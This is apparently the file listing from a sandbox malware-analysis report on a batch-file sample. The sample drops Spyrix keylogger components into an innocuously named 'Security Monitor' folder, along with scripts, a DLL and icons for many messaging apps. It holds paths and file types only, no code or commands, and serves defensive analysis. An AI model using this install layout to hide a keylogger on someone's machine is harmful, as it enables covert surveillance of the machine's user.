Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
D0WmCTD2qO.bat
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x7b1c7063, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4FIMA.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-54IQ1.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-6M4L4.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-71RG7.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7BSH8.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7TR0J.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-83T5E.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8H67S.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8SR9P.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-90D3G.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9IG5O.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-B7IP4.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-BCRFE.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CNDLQ.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CPSH6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-D1RJC.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-EBTAV.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-ENTLF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FF5AQ.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FH6KB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HML4Q.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-IH34D.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JBP8C.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JFM1S.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-K3IR9.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KOLJL.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-L2SUC.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-LBHSB.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-LCPD4.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NAPE1.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NRBR0.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NRRJB.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-Q2QLR.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-QCQRK.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-R1S26.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-S4354.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-SDUR6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-SUHLM.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-TFKN8.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-TLFJN.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-UBVGD.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-V1P7E.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-V390T.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VMNQ3.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VMP9K.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VVBTQ.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Discord.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Facebook Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Google Talk.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Line.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mail Agent.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Microsoft Teams.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mozilla Thunderbird.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Opera Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Telegram.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Tencent QQ.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Viber.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\WhatsApp.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Windows Live Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Yahoo! Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Zoom.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\aim.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\icq.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-0DCNF.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-25RT0.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-2D77M.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-4GP22.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-4OBL8.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-5H5M1.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-8Q4PG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-8UNNB.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-BN700.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-C9MB7.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-EJLK2.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-I5U00.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-J0B7Q.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-KACC0.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-MEBT7.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-MGKCG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OFJQK.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OMO2M.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
